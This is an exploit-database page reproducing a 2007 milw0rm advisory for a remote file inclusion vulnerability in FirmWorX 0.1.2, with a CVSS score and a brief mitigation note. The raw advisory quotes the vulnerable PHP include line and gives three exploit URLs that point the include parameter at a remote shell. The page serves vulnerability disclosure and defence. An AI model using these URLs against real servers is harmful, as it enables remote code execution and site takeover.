header-logo
Suggest Exploit
vendor:
FirmWorX
by:
DeltahackingTEAM
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: FirmWorX
Affected Version From: 2000.1.2
Affected Version To: 2000.1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

FirmWorX 0.1.2 Remote File Inclusion Vulnerability

The vulnerability allows remote attackers to execute arbitrary files by including a remote file in the vulnerable application.

Mitigation:

Ensure that input validation is performed on user-supplied input to prevent remote file inclusion attacks. Remove or restrict any unnecessary file inclusion functionality.
Source

Exploit-DB raw data:

**********************************************************************************************************
                                              DeltaSecurityTEAM
                                              WwW.DeltaSecurity.iR
**********************************************************************************************************

* Portal Name = FirmWorX 0.1.2

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://firmworx.sourceforge.net

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Dav00d_Cracker

* Conatact = Davood_cracker@yahoo.com

--------------------------------------------------------------------------------------------

Vulnerability C0de :


require_once($fm_data['root']."/includes/config/db.inc.php");

--------------------------------------------------------------------------------------------

- Expl0it:

http://localhost/[PATH]/includes/config/master.inc.php?fm_data[root]=Shellz?
http://localhost/[PATH]/includes/functions/master.inc.php?fm_data[root]=Shellz?
http://localhost/[PATH]/modules/bank/includes/design/main.inc.php?bank_data[root]=Shellz?

--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , And all I

**********************************************************************************************************

# milw0rm.com [2007-05-24]

Navigation

Suggest Exploit

Services By CQR